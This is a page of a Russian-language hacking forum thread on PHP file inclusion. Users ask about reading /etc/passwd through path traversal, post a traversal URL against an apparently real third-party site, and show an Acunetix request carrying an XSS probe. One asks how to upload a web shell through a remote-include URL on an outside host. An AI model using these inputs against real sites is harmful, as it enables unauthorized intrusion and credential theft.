HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу PHP File Inclusion - От ошибки до шелла
   
Ответ
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 30.01.2012, 01:00
NZT
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами: 7561046

Репутация: 0
По умолчанию
Скажите пожалуйста , если у меня стоит windows то /etc/passwd у меня не будет работать только в dvwa ? Или с windows не будет работать и в остальных тренировачных сайтах для взлома и на всех сайтах в интернете?
Заранее спасибо за ответ.
 
Ответить с цитированием

  #22  
Старый 31.01.2012, 01:00
NZT
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами: 7561046

Репутация: 0
По умолчанию
M@ZAX@KEP а как ты можешь обьяснить то что я на античате с разделе php injection зашел по уязвимой ссылке с etc/passwd и я увидел содержимое файла ?( куча надписей с логинами) Хоть у меня виндовс.
И скажи пожалуйста в уровне medium возможен file inclusion? А то у меня чето не получается , как написано в разных статьях (
 
Ответить с цитированием

  #23  
Старый 02.02.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию
Цитата:


а как ты можешь обьяснить то что я на античате с разделе php injection зашел по уязвимой ссылке с etc/passwd и я увидел содержимое файла ?( куча надписей с логинами) Хоть у меня виндовс.



Элементарно, Ватсон. Вы нассали в холодильник (известный анекдот).

А если серьёзно, то перечитай статью и да наступит просветление, что php-injection - серверная уязвимость. То есть то, что ты видишь, это то, что делает сервер, а не твой компьютер. Но если у тебя винда, то localhost для тебя - виндовый сервер (очевидно кагбэ), и там /etc/passwd нет и быть не может. И в dvwa его тоже не будет, ибо всё равно сервер виндовый. А по ссылке ты попал на самый обычный никсовый сервант.

Цитата:


просто при наборе etc/passwd в адресной строке можно увидеть пароли(хоть и зашифрованые) ?



Да, если присутствует уязвимость php-inj (не ограниченная open_basedir), если файл существует (его нет в BSD и win системах) и если он доступен для чтения пользователю веб-сервера.
 
Ответить с цитированием

  #24  
Старый 04.02.2012, 01:00
NZT
Новичок
Регистрация: 31.12.2011
Сообщений: 25
С нами: 7561046

Репутация: 0
По умолчанию
Спасибо большое M@ZAX@KEP за толковые обяснения.
Вот та ссылка о которой я говорил : http://to-maxima.com/index.php?page=.../../etc/passwd , тут присутствует php-inj , файл существует и доступен для чтения , но где там пароли ? Там они есть или я не туда смотрю ?
 
Ответить с цитированием

  #25  
Старый 28.06.2017, 01:00
vostokrusi
Новичок
Регистрация: 29.05.2011
Сообщений: 2
С нами: 7872086

Репутация: 0
По умолчанию
Доброго времени всем. Просканил сайт Acunetix'ом.

IMAGE https://image.prntscr.com/image/L-o9hPwLTFOA-wXUwbbnBA.png

В отчёте написано, что в настройках сервера не отключён allow_url_include

Сами настройки:

IMAGE https://image.prntscr.com/image/X6kFF5MjQ-6gPsCh3lkCUA.png

Отчёт:

code:

GET /info.php HTTP/1.1
Cookie: _ym_uid=14984435435718202328; was=true; _ym_isad=2; _ym_visorc_43544474=w; _ym_visorc_3085454966=w; jv_enter_ts_BVXa68GV9s=13284253266961; jv_visits_count_BVXa68GV9s=1; jv_refer_BVXa68GV9s=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0% 2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_BNXa68GV9s=; jv_pages_count_BNXa68GV9s=1; close_popup=true; jv_close_time_BNXa68GV9s=1498425912526; core=r9sqq4hc8g39434fl4p9rjo1ur3; yandexuid=1459332343535345929; yp=1814355929.yrts.149843459; yabs-sid=41424093453455929
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Подскажите пожалуйста, есть ли варианты залить шелл? Если да, какие должны быть мои дальнейшие действия?
Не могу понять, в каком url подставлять: ?page=http://our.hosting.ru/include.txt
И что если на сайте нет страниц с параметрами?
 
Ответить с цитированием
Ответ
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.